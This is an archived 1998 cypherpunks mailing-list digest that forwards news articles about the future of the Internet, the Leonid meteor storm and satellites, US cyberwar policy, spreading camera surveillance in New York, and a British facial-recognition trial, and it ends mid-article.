by Bill Burke/BusinessToday staff 

The Internet is not going away, but it is about to undergo a facelift.

With the demand for faster, more reliable data communications access
growing, some technology pundits are predicting the death of the Internet.

Radio took 38 years to reach an audience of 50 million people, according to
Sprint CEO William T. Esrey. The Internet has taken only four years to
reach that same audience. Despite that growth, it has reached critical mass
and is due flare out in the near future, he said.

"The Internet is going away," Esrey said. "The Internet will be replaced
with other networks."

But according to a panel at the Wall Street Journal Technology Summit this
morning, that demise is being prematurely reported.

"One of the beauties of the Internet is that it can change in several
places simultaneously," said Robert Metcalfe, vice president of Technology,
International Data Group. "There are five or 10 next generation Internets
coming." 

However, there are threats to the growth of the new Net. The first 25 years
of the Internet has been characterized by governmental subsidies and
community cooperation. Recently, the financial payoff has led to heretofore
unseen posturing and political infighting -- something that could threaten
the development of future networks, according to John M. McQuillan,
president of McQuillan Consulting.

Add in new technologies, however, and the next generation begins to take
shape.

"I think where we are with the Internet where we were 100 years ago with
electricity," said Paul R. Gudonis, president of GTE Internetworking.
"We're still in the early stages of this."

Gudonis said the Internet is about to become more applications-based,
forcing businesses to re-think their approach.

"Business is going through an adoption cycle," he said. "Now we're seeing
the second coming of re-engineering."

Changes will come in how corporations go about prospecting, learning how to
sell, and "totally revamping how they actually do business."

As a result, companies are preparing for the next incarnation, building a
massive new backbone for each new network, and preparing for, among other
things, streaming video.

"Everybody's getting ready for video," Gudonis said. "Everybody's going to
go camera crazy, I think."

But the bottom line is that capitalism has met the Net, and it will not be
the same.

"Where we are, is at the end of the beginning of the Internet," McQuillan
said.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:40:53 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Heavy Leonid meteor shower threatens communications
Message-ID: <199810070334.UAA27097@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Heavy Leonid meteor shower threatens communications
Date: Tue, 06 Oct 1998 06:11:35 -0500
To: believer@telepath.com

Source:  San Francisco Examiner
http://www.examiner.com/981004/1004meteor.shtml

Heavy Leonid meteor shower threatens communications

Annual light show biggest in 32 years

By Keay Davidson
EXAMINER SCIENCE WRITER

A spectacular meteor storm will ignite the heavens in mid-November,
possibly "sandblasting" satellites and threatening everyday services from
cell phones to TV shows to data communications.

The last great meteor barrage came in 1966, when space satellites were far
less common - and far less essential to everyday life. Back then, thousands
of meteors per minute shot across the North American sky.

Today, the skies are jammed with satellites that aid in weather
forecasting, relay data communications and TV signals, and enable military
surveillance.

The world's satellite network is a juicy target for the blistering
celestial rain.

Although the meteors are smaller than grains of sand, they travel
tremendously fast - more than 40 miles per second, equivalent to a
10-second flight from San Francisco to Los Angeles. As a result, they could
knock out or disrupt some satellites' delicate electronics.

"This meteoroid storm will be the largest such threat ever experienced by
our critical orbiting satellite constellations," William H. Ailor, director
of the Center for Orbital and Reentry Debris Studies at the Aerospace Corp.
in El Segundo, Los Angeles County, told the House Science Committee on May 21.

The 1966 storm appeared over continental North America, but this year's
main aerial assault will be visible from Japan, China, the Philippines and
other parts of east Asia, and possibly Hawaii. The meteors are debris from
a comet, Tempel-Tuttle.

Scientists from NASA's Ames Research Center in Mountain View hope to study
the shower from aircraft flying out of Okinawa, says Ames principal
investigator Peter Jenniskens. They hope to broadcast live TV images of the
shower over the World Wide Web.

The "Leonid" meteor shower is so named because the meteors appear to
emanate from the direction of the constellation Leo. Actually, the shower
is a cloud of rocky particles orbiting the sun. 

Annual event

Earth crosses the cloud's path every Nov. 17 and 18. At that time, amateur
astronomers enjoy seeing the "Leonids" zip across the sky, sometimes
several per minute.

But every 30-plus years, our planet crosses a particularly dense part of
the Leonid cloud. So the "shower" becomes a "storm," with up to 40 meteors
per second and sometimes 50,000 per hour.

Although very tiny, the particles move so fast that the friction with
Earth's atmosphere will cause them to burn and glow. Visible from hundreds
of miles away, they will make the sky look like fireworks.

NASA plans to turn the Hubble Space Telescope away from the storm so
meteors that hit the giant orbital telescope will miss its super-delicate
mirror, says NASA spokesman Don Savage.

"NASA is taking (the shower) seriously," Savage said. "We have been
assessing what we need to do to ensure our satellites in Earth orbit are
going to be operated in a safe manner during this meteor shower."

Other satellites might be temporarily re-oriented so that they present the
narrowest "cross section" - the smallest target.

"We are concerned, and we have been in meetings and making plans concerning
the Leonid shower," said U.S. Army Maj. Mike Birmingham, a spokesman for
the U.S. Space Command in Colorado, which monitors
American military and spy satellites.

In his congressional testimony, Ailor said that "because of the very high
speed of the particles - they will be moving at speeds of over... 155,000
mph - the storm poses an even greater and somewhat unknown threat."

Most particles tiny

"Fortunately, most of the particles... are very small, smaller than the
diameter of a human hair, and won't survive passage through the Earth's
atmosphere," Ailor said. "Our satellites, however, are (in space and) not
protected by the atmosphere, so they will be 'sandblasted' by very small
particles traveling more than 100 times faster than a bullet. 

"At these speeds, even a tiny particle can cause damage or electrical
problems," Ailor said. "While major holes and physical damage to solar
panels and structures are very unlikely, impacts of small particles will
create an electrically charged plasma which can induce electrical shorts
and failures in sensitive electronic components."

Last month, an immense wave of radiation from a neutron star washed over
Earth, causing at least two scientific satellites to shut down to protect
their electronics.

Astronomers said the star, in a constellation about 20,000 light-years
away, had unleashed enough energy to power civilization for a
billion-billion years. But by the time the radiation found its way across
the cosmos and through the atmosphere, it was no stronger than a typical
dental X-ray, scientists said.

No conflict with space missions

The upcoming meteor shower is not expected to conflict with scheduled space
missions.

The first components of the international space station - a kind of village
in space - aren't planned for launch until late November and December,
after the shower, Savage said.

U.S. Sen. John Glenn, an Ohio Democrat and former astronaut, is scheduled
to rocket into orbit on the space shuttle Oct. 29, returning before the
Leonid shower.

Armed with sensitive monitors, Jenniskens' colleagues will study the
meteors' "spectra" - frequencies of light that reveal the particles'
chemical composition - through portholes in the roof of a plane. Scientists
will also
study the particles' effects on atmospheric chemistry, such as the ozone
layer that shields us from cancer-causing solar radiation.

The scientists hope to measure the particle stream, which may be as dense
as one extremely small particle every 10 square meters. If so, then every
satellite in the sky may get hit, Jenniskens say.

Jenniskens' project - involving some 30 scientists and two aircraft - is
funded by NASA, the U.S. Air Force and the National Center for Atmospheric
Research in Boulder, Colo.

He hopes to transmit high-resolution TV images of the incoming meteors via
TV or the Web across a 30-degree field of sky.

More information on the project is available on the Internet at
www-space.arc.nasa.gov/~leonid/.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:41:55 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Cyberwar: Proper Vigilance Or Paranoia?
Message-ID: <199810070334.UAA27114@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Cyberwar: Proper Vigilance Or Paranoia?
Date: Tue, 06 Oct 1998 06:16:19 -0500
To: believer@telepath.com

Source:  ZDNet
http://www.zdnet.com/intweek/printhigh/100598/cover/chapter1.html

Cyberwar: Proper Vigilance Or Paranoia?

 By Will Rodger

The last war was on land, air and
sea. The next one may be on
your computer. Armed with
reams of data showing dramatic
increases in computer crime since
1995, a wide-ranging but
little-noticed federal working
group is moving swiftly to try to
 knit together a private and public partnership against
 armies of hackers, government spies and terrorist agents
 that could make cyberspace unsafe for democracy. 

 The fear: that no part of the industrialized world is safe
 from digital disaster. Successful attacks on power grids,
 hospitals, banks, farms, factories and railroad switches
 could plunge a target nation into chaos and dysfunction. 

 Administration officials say this is no joke, ticking off
 threats already encountered: 

A 19-year-old Israeli hacker, known as the
Analyzer, and two California teenagers successfully
penetrate U.S. Department of Defense computers in
February, setting off fears that their intrusions are
related to U.S. troop buildups against Iraq. 

Russian hacker Vladimir Levin breaks into Citibank
systems and steals $12 million in 1994. He escapes
arrest for one year, only to be brought to justice as
he gets off a flight to London and walks into the
arms of Interpol. 

A study by network security specialist Dan Farmer
that shows more than 60 percent of 1,700
high-profile Web sites - many run by banks - can be
broken into or destroyed using a program he
designed to probe for weaknesses no system
administrator should allow in the first place. 

 At the center of the U.S.' attempts to create a
 cyberdefense structure is the Critical Infrastructure
 Coordination Group, an assembly of cabinet
 undersecretaries and other senior officials sworn to work
 with the FBI and American business to protect a society
 that now depends on a safe, free flow of bits and bytes.
 But even as the defense structure emerges, civil
 libertarians, industry executives and even administration
 insiders worry about how well the Clinton administration or
 its successors can steer between protecting against all
 forms of disruption on one hand and creating a police state
 on the other. 

 Fears that police agencies will use the threat to gain
 unprecedented power "reflect a misunderstanding of what
 we're all about and what the administration is all about,"
 said Michael Vatis, director of the National Infrastructure
 Protection Center (NIPC) at the FBI. "We are structured
 as a real partnership [between government and free
 enterprise]. It's our own intention to bring people on board
 from the private sector. We all say the same thing." 

 But James Adams, former chief executive officer of United
 Press International and head of the newly formed
 Infrastructure Defense Inc. consultancy, said government
 must surrender more power first. "I don't think the
 government can any longer say we know what's good for
 you and we're going to take care of it. The government is
 becoming increasingly irrelevant. I'm not arguing that's a
 good thing or a bad thing - it's simply a fact." 

 Either way, bitter, seemingly endless disputes between the
 administration and the people whose cooperation it needs
 already have tainted the process of developing a national
 approach to protecting critical information assets, both
 sides said. A five-year battle over use and export of
 data-scrambling technologies crucial to data security, for
 instance, has alienated much of the computer industry. FBI
 demands that telephone companies spend hundreds of
 millions of dollars to make wiretaps easier to perform,
 meanwhile, have led to charges of betrayal by phone
 companies that claim they were promised more
 compensation than they're getting, and civil libertarians who
 say the new proposals invite abuse by rogue police. 

 As a result, what should be a cooperative effort to secure
 the nation from outside attacks threatens to bog down in a
 morass of mistrust and stony silence. 

 "Our members are scared to death of this whole program,"
 a Washington association executive said, insisting on
 anonymity. "You've got the FBI and the National Security
 Agency pushing this thing. These guys are spies. Then there
 are these 'private sector' groups springing up to coordinate
 'information sharing' about how different companies have
 these huge holes in their networks. Some of them are
 headed by ex-Defense Department people. The whole
 thing makes us paranoid." 

 Worse, still, the lobbyist said: The nation's chief computer
 security organization - the secretive, estimated
 50,000-employee National Security Agency (NSA) - is
 the same one responsible for wiretapping and signal
 interception everywhere outside the U.S. As long as the
 world's biggest Big Brother has a major role to play,
 business may be gun-shy of the program. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:40:53 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Spycam City: The surveillance society: part one
Message-ID: <199810070334.UAA27128@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Spycam City: The surveillance society: part one
Date: Tue, 06 Oct 1998 06:18:00 -0500
To: believer@telepath.com

Source:  Village Voice
http://www.villagevoice.com/ink/news/40aboal.shtml

Spycam City:  The surveillance society: part one 

 by Mark Boal 

 Cameras stare as you browse at Barnes and
 Noble or rent a video at Blockbuster. They record
 the way you handle the merchandise at Macy's or
 how you glide to the music at the Union Square
 Virgin Megastore. Grab a latte at Starbucks,
 brunch on borscht at Veselka, or savor a martini at
 the Union Bar: cameras are watching every sip you
 take. Peering from skyscrapers with lenses that can
 count the buttons on a blouse three miles away,
 they watch every move you make. 

 Even Rudy likes to watch.After testing reaction to
 the monitoring of parks, public pools, and subway
 platforms, the city is quietly expanding a pilot
 program on buses. Cameras indistinguishable from
 lampposts have advanced from the perimeter of
 Washington Square into the heart of the park.
 They're already hidden at some bus stops and
 intersections to snag speeders and parking perps.
 More are on the way. 

 The Housing Authority is rushing to put
 bulletproof cameras in corridors throughout city
 projects. 

 At P.S. 83 in the Bronx, covert cameras cover
 the schoolyard; six other Bronx schools will soon
 follow suit. 

 Even university students are under watch, as
 activists at City College realized last June when
 they found a camera hidden in the smoke detector
 outside their meeting room. The administration had
 put it there. 

 Two local jails--Valhalla and Dutchess
 County--are adding cameras to their guards'
 helmets to go along with the ones in the visiting
 rooms and some cells. 

 With little public awareness and no debate, the
 scaffolding of mass surveillance is taking shape."it's
 all about balancing a sense of security against an
 invasion of privacy," Rudolph Giuliani insists. But
 the furtive encroachment of surveillance is Norman
 Siegel's latest lost cause. "I feel like Paul Revere,
 shouting 'The cameras are coming, the cameras are
 coming.' " says the New York Civil Liberties
 Union's executive director. 

 All summer, a crew of NYCLU volunteers
 scoured Manhattan on a mission to pinpoint every
 street-level camera. Next month, Siegel will unveil
 their findings: a map showing that cameras have
 become as ubiquitous as streetlights. It's impossible
 to say how many lenses are trained on the streets
 of New York, but in one eight-block radius, the
 NYCLU found over 300 in plain sight. And as one
 volunteer acknowledges, "There are tons of hidden
 cameras we didn't catch." 

 That's because it's routine in the security trade to
 buttress visible cameras with hidden ones, "so
 everything's covered and it doesn't look like a
 fortress," as one consultant says. These spycams
 scan unseen in tinted domes, from behind mirrors,
 or through openings the size of a pinhole. Under
 the joystick command of a distant operator, they're
 capable of zooming in or spinning 360 degrees in
 less than a second. If you listen to the people who
 install them, cameras are as common and elusive as
 shadows. But does anybody really care? 

 No New York law regulates surveillance (except
 to require cameras at ATM machines). Statutes
 that prohibit taping private conversations have
 been outpaced by video technology. Your words
 can't be recorded without your consent, but you
 can be videotaped in any public place. And you
 don't own your image (except for commercial
 purposes). 

 It took the Supreme Court some 90 years to apply
 the Fourth Amendment's privacy protection to the
 telephone. Before a landmark 1967 case, it was
 legal to bug a phone booth. When legislators finally
 reined in wiretapping in 1968, video was a speck
 on the horizon, and cameras were excluded from
 the law. Now Congress is inundated with privacy
 bills, but few survive the combined resistance of
 manufacturers, service providers, law enforcement,
 and the media. 

 In 1991 and 1993, proposals to limit surveillance
 were killed in committee by a lobby of 12,500
 companies. Testifying against rules that would have
 required companies to notify their workers--and
 customers--of cameras, Barry Fineran of the
 National Association of Manufacturers called
 "random and periodic silent monitoring a very
 important management tool." This alliance backs its
 rhetoric with cash. During the 1996 Congressional
 campaign, finance and insurance companies alone
 invested $23 million in their antiprivacy agenda.
 And so the cameras keep rolling. 

 It's clear that surveillance makes many people feel
 safer. But researchers disagree about its value as a
 crime deterrent.The consensus is that cameras can
 curb spontaneous crimes like vandalism, but are
 less effective in stopping more calculated felonies.
 Though spycams are in banks and convenience
 stores, robberies at these places are staples of the
 police blotter. Hardcore crooks learn to work
 around surveillance: witness the masked bandit.
 And many cameras that promise security are only
 checked occasionally; their real purpose is not to
 stop a crime in progress, but to catch perps after
 the fact. Those reassuring cameras on subway
 platforms are there to make sure the trains run on
 time. 

 It's telling that the camera quotient is increasing in
 the midst of a dramatic decline in crime.Clearly the
 spread of surveillance has less to do with
 lawlessness than with order. "Just don't do anything
 wrong," advises the smiling cop monitoring the
 hidden cameras in Washington Square, "and you
 have nothing to worry about." 

 But Americans are worried. Last year, 92 percent
 of respondents told a Harris-Westin poll they were
 "concerned" about threats to privacy, the highest
 level since the poll began in the late '70s. Despite
 this concern, there's been little research into the
 effects of living in an omnivideo environment.
 Surveillance scholarship was hip in the '60s and
 '70s, but academic interest has dropped noticeably
 in the past 20 years. In the neocon '90s, the
 nation's preeminent criminologist, James Q.
 Wilson, says he "never studied the subject [of
 security cameras] or talked to anyone who has." 

 One reason for this apathy is the academy's
 dependence on government money. "Federal
 funding does not encourage this kind of research,"
 says sociologist Gary Marx, one of the few
 authorities on surveillance. "The Justice
 Department just wants to know about crime
 control. It's bucks for cops." In fact, Justice money
 is lavished, not on research but on surveillance
 hardware. 

 In this investigative void, a plucky new industry has
 sprung up. Sales of security cameras alone will
 total an estimated $5.7 billion by 2002. Cameras
 are now an integral part of new construction, along
 with sprinklers and smoke detectors. But the
 strongest sign that monitoring has gone mainstream
 is the plan by a security trade association to
 incorporate surveillance into the MBA curriculum. 

 Budding businessmen are interested in cameras
 because they are a cheap way to control
 wandering merchandise and shield against liability.
 Fast-food chains like McDonald's protect
 themselves from litigious customers with hidden
 camerasthat can catch someone planting a rat tail in
 the McNuggets. Surveillance also helps managers
 track workers' productivity, not to mention
 paper-clip larceny and xerox abuse. Though most
 employers prefer to scan phone calls and count
 keystrokes, it's legal in New York (and all but
 three states) for bosses to place hidden cameras in
 locker rooms and even bathrooms. 

 A 1996 study of workplace monitoring calculates
 that, by the year 2000, at least 40 million American
 workers will be subject to reconnaissance;
 currently, 85 percent of them are women, because
 they are more likely to work in customer service
 and data entry, where monitoring is commonplace.
 But that's changing as white-shoe firms like J.P.
 Morganput cameras in the corridors. 

 Meanwhile, in the public sector, New York City
 transit workers can expect scrutiny for "suspected
 malingering and other misuse of sick leave [by]
 confidential investigators using video surveillance,"
 according to a confidential MTA memo. Though
 the police would need a warrant to gather such
 information, employers don't."When most
 Americans go to work in the morning," says Lewis
 Maltby of the ACLU, "they might as well be going
 to a foreign country, because they are equally
 beyond the reach of the Constitution." 

 New York is hardly the only spy city. More than
 60 American urban centers use closed-circuit
 television in public places. In Baltimore, police
 cameras guard downtown intersections. In San
 Francisco, tiny cameras have been purchased for
 every car of the subway system. In Los Angeles,
 the camera capital of America, some shopping
 malls have central surveillance towers, and to the
 north in Redwood City, the streets are lined with
 parabolic microphones. Even in rustic Waynesville,
 Ohio, the village manager is proud of the cameras
 that monitor the annual Sauerkraut Festival. 

 America is fast becoming what Gary Marx calls "a
 surveillance society," where the boundary between
 the private and the public dissolves in adigital haze.
 "The new surveillance goes beyond merely
 invading privacy . . . to making irrelevant many of
 the constraints that protected privacy," Marx
 writes in Undercover: Police Surveillance in
 America. For example, mass monitoring allows
 police to eliminate cumbersome court hearings and
 warrants. Immediately after a crime, cops check
 cameras in the vicinity that may have captured the
 perp on tape. 

 So, as surveillance expands, it has the effect of
 enlarging the reach of the police. Once it becomes
 possible to bank all these images, and to call them
 up by physical typology, it will be feasible to set up
 an electronic sentry system giving police access to
 every citizen's comings and goings. 

 This apparatus isn't limited to cameras. Recent
 mass-transit innovations, such as the MetroCard,
 are also potential surveillance devices. A
 MetroCard's magnetic strip stores the location of
 the turnstile where it was last swiped. In the future,
 Norman Siegel predicts, it will be possible for
 police to round up suspects using this data. E-Z
 Passes already monitor speeding, since they
 register the time when drivers enter
 tollbooths.Once transportation credits and bank
 accounts are linked in "smart cards" (as is now the
 case in Washington, D.C.), new surveillance vistas
 will open to marketers and G-men alike. 

 Already the FBI clamors for the means to monitor
 any cell-phone call. Meanwhile other government
 agencies are developing schemes of their own. The
 Department of Transportation has proposed a rule
 that would encode state drivers' licenses, allowing
 them to double as national identity cards.
 Europeans know all about internal passports, but
 not even the East German Stazi could observe the
 entire population at a keystroke. "What the secret
 police could only dream of," says privacy expert
 David Banisar, "is rapidly becoming a reality in the
 free world." 

 What's more, spy cams are getting smaller and
 cheaper all the time. "A lens that used to be 14
 inches long can now literally be the size of my
 fingernail," says Gregg Graison of the spy shop
 Qark. Such devices are designed to be hidden in
 everything from smoke detectors to neckties.
 Qark specializes in souping up stuffed animals for
 use in monitoring nannies. A favorite hiding place is
 Barney's foot. 

 These devices reflect the growing presence of
 military hardware in civilian life. The Defense
 Department's gifts to retail include night-vision
 lenses developed during the Vietnam War and now
 being used to track pedestrians on 14th Street. A
 hundred bucks at a computer store already buys
 face-recognition software that was classified six
 years ago, which means that stored images can be
 called up according to biometric fingerprints. "It's
 all about archiving," says John Jay College
 criminologist Robert McCrie. And in the digital
 age, the zip drive is the limit. 

 The template for storing and retrieving images is
 Citibank's futuristic monitoring center in Midtown
 (this reporter was asked not to reveal the location),
 where 84 PCs flash images in near-real time from
 every branch in the city and beyond. Every day
 over a quarter of a million metro New Yorkers
 pass under these lenses. When the bank upgrades
 to digital in the next year or so, each image will be
 recorded and archived for 45 days. 

 What alarms civil libertarians is that "no one knows
 what happens to the tapes once they are recorded,
 or what people are doing with them," as Norman
 Siegel says. In fact, mass surveillance has created a
 new kind of abuse. Last summer, a police sergeant
 in Brooklyn blew the whistle on her fellow officers
 for improper use of their cameras. "They were
 taking pictures of civilian women in the area," says
 the policewoman's attorney, Jeffrey Goldberg,
 "from breast shots to the backside." 

 But you don't need a badge to spy, as plaintiffs
 around the country are discovering: 

 At a Neiman-Marcus store in California, a
 female worker discovered a hidden camera in the
 ceiling of her changing room that was being
 monitored by male colleagues. At the Sheraton
 Boston Hotel, a union president invited a comrade
 to view a videotape of himself in his underwear.
 The hotel was monitoring its workers' changing
 rooms. 

 In Maryland, a 17-year-old lifeguard was
 videotaped changing into her bathing suit by her
 supervisor at the county swimming pool. Elsewhere
 in that state, a couple discovered that a neighbor
 had installed two cameras behind bathroom heating
 ducts and had monitored them for six months. 

 On Long Island, a couple discovered a pinhole
 camera watching the bedroom of their rented
 apartment. It had been planted by the owner. In
 Manhattan, a landlord taped a tenant having sex
 with his girlfriend in the hallway, and presented it
 along with a suggestion that the tenant vacate the
 premises. He did. 

 In this laissez-faire environment, whoever
 possesses your image is free to distribute it. And
 just as images of Bill Clinton leading a young
 woman into his private alcove ended up on Fox
 News, so can your most private moments if they
 are deemed newsworthy--as one Santa Monica
 woman learned to her horror when footage of her
 lying pinned inside a crashed car, begging to know
 if her children had died, ended up as infotainment.
 The paramedic, as it turns out, was wired. 

 The harvest from hidden cameras can also end up
 on the Internet, via the many Web sites that offer
 pics of women caught unaware. There are hidden
 toilet cams, gynocams, and even the intrepid
 dildocam. Though some of these images are clearly
 staged, others are real.Their popularity suggests
 that whatever the rationale, surveillance cameras
 resonate with our desire to gaze and be gazed
 upon. As J.G. Ballard, author of the sci-fi classic
 Crash, putsit, these candid-camera moments "plug
 into us like piglets into a sow's teat, raising the
 significance of the commonplace to almost
 planetary dimensions. In their gaze, we expose
 everything and reveal nothing." But exposure can
 be a means to an end. "Once the new surveillance
 systems become institutionalized and taken for
 granted in a democratic society," warns Gary
 Marx, they can be "used against those with the
 'wrong' political beliefs; against racial, ethnic, or
 religious minorities; and against those with lifestyles
 that offend the majority." 

 Earlier this month, New York police taped large
 portions of the Million Youth March in Harlem.In
 the ensuing furor over whether the tapes accurately
 portrayed the police response to a rowdy activist,
 a more basic issue went unaddressed. Social
 psychologists say that taping political events can
 affect a participant's self-image, since being
 surveilled is unconsciously associated with
 criminality. Ordinary citizens shy away from politics
 when they see activists subjected to scrutiny. As
 this footage is splayed across the nightly news,
 everyone gets the meta-message: hang with
 dissenters and you'll end up in a police video. 

 But even ordinary life is altered by surveillance
 creep. Once cameras reach a critical mass, they
 create what the sociologist Erving Goffman called,
 "a total institution," instilling barely perceptible
 feelings of self-consciousness. This process
 operates below the surface of everyday
 awareness, gradually eroding the anonymity people
 expect in cities. Deprived of public privacy, most
 people behave in ways that make them
 indistinguishable: you're less likely to kiss on a park
 bench if you know it will be on film. Over the long
 run, mass monitoring works like peer pressure,
 breeding conformity without seeming to. 

 Communications professor Carl Botan
 documented these effects in a 1996 study of
 workplace surveillance. Employees who knew they
 were being surveilled reported higher levels of
 uncertainty than their co-workers: they were more
 distrustful of bosses, their self-esteem suffered, and
 they became less likely to communicate. The result
 was "a distressed work force." 

 The anxiety of being watched by an unseen eye is
 so acute that the 18th-century philosopher Jeremy
 Bentham made it the basis of his plan for a humane
 prison, in which inmates were to be controlled by
 the knowledge that they might be under
 observation. Bentham called this instrument of
 ambiguity the Panopticon. 

 Ever since then, the power of the watcher over the
 watched has been a focal point of thinking about
 social control. The philosopher Michel Foucault
 regarded the panoptic force as an organizing
 feature of complex societies. Surveillance, Foucault
 concluded, is the modern way of achieving social
 coherence--but at a heavy cost to individuality.
 Spycams are the latest incarnation of this impulse.
 Welcome to the New Improved
 Panopticon.Twenty-five years ago, Mayor John V.
 Lindsay installed cameras in Times Square. But he
 took them down after 18 months because they
 only led to 10 arrests--causing The New York
 Times to call this experiment "the longest-running
 flop on the Great White Way." No such ridicule
 has greeted Giuliani's far more ambitious
 surveillance plans and his cheeky assertion that
 "you don't have an expectation of privacy in public
 spaces." 

 It's a brave new world, but very different from the
 ones imagined by Aldous Huxley and George
 Orwell. Nineteen Eighty Four taught us to be
 alert to the black-booted tyrant. The Truman
 Show updates this Orwellian model as the saga of
 an ordinary man whose life is controlled by an
 omniscient "creator," a TV producer who orders
 the 5000 cameras surrounding his star to zoom in
 or pull back for the perfect shot. 

 As inheritors of Orwell's vision, we are unable to
 grasp the soft tyranny of today's surveillance
 society, where authority is so diffuse it's
 discreet.There is no Big Brother in Spycam City.
 Only thousands of watchers--a ragtag army as
 likely to include your neighbor as your boss or the
 police. In 1998, anybody could be watching you. 

 This is the first of a three-part series. 

 Part Two: Behold Jennifer, the Surveillance
 Celebrity 

 Additional reporting: Emily Wax. Research:
 Michael Kolber 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:38:40 +0800
To: cypherpunks@cyberpass.net
Subject: IP: New Surveillance Face Mapping System
Message-ID: <199810070334.UAA27141@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: New Surveillance Face Mapping System
Date: Tue, 06 Oct 1998 08:54:09 -0500
To: believer@telepath.com

Source:  The London Independent
U.K. Section
http://www.independent.co.uk/

New spy system to 'map' suspects 

By Jason Bennetto, Crimes Correspondent 

A REVOLUTIONARY surveillance system that
allows the police to automatically identify the
faces of wanted criminals and suspects in seconds
is to be tested on the streets of Britain for the first
time. 

The "facial mapping" computer will be used to
catch muggers, burglars and shoplifters, but it is
expected to be extended to target other cases
including wanted killers, terrorists and missing
children. The Football Association is also
interested in using the technology to help pick out
known hooligans at matches. 

The system, known as Mandrake, is to be tested
by Scotland Yard and Newham borough council
in a six-month trial in east London, starting next
week. 

A computer data base of faces of offenders will
be compared with film taken by local authority
surveillance cameras in shopping centres, streets
and housing estates. The computer automatically
"matches" the faces of suspects and triggers an
alarm, warning the operator who then contacts
the police. 

More than 1,000 images can be examined per
second. It automatically ignores beards and
moustaches so offenders cannot hide under
disguises. 

Photo-fit images can also be included on the data
base but tests show they are less accurate than
photographs. 

The system was criticised yesterday by the civil
rights organisation Liberty, which said it could fall
foul of human rights and data protection
legislation. 

However the developers of Mandrake, the police
and local councils, believe the system could
revolutionise CCTV and, if it proves successful, is
likely to be used nation-wide. 

Facial recognition systems are already used in
Texas to stop sham marriages and on the
Mexican border to prevent illegal immigration. 

Under the trial, Scotland Yard is providing
dozens of photographs of wanted offenders, often
taken by surveillance cameras in shops and
banks. It will also supply pictures of convicted
criminals, mostly for offences such as street
robbery, burglary, and repeat shoplifting. 

The images will be placed on the computer which
measures dozens of key facial characteristics,
such as the eye shape and size. The computer
then scans all the faces picked out on CCTV and
will sound an alarm if it makes a match. 

The picture of suspect and the person they
supposedly resemble then automatically appear
on the CCTV operator's screen along with a
secret code number. The police are then sent the
pictures and the number via computer. 

The product, which has been developed by
Software and Systems International in Slough,
west of London, can be used to catch criminals
on the run or missing persons. More
controversially, it can also be used to track
suspects who the police believe may commit
offences. 

In future the police, customs, and immigration
officers could use it at ports to identify known
terrorists, smugglers and other criminals
attempting to enter the country. 

A Scotland Yard spokesman said the system had
an 80 per cent "hit" rate. On the question of civil
liberties, he argued: "If you are innocent you have
nothing to worry about." It has been tested at
Watford football ground, but the poor quality of
the surveillance equipment made it difficult for the
computer to make matches. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 6 Oct 1998 13:40:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: SOROS: Must have economic "third way"
Message-ID: <199810070334.UAA27152@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: SOROS: Must have economic "third way"
Date: Tue, 06 Oct 1998 08:56:17 -0500
To: believer@telepath.com

Source:  The London Independent
U.K. Section
http://www.independent.co.uk/

Soros calls for new cash restraints

GEORGE SOROS, one of the world's leading
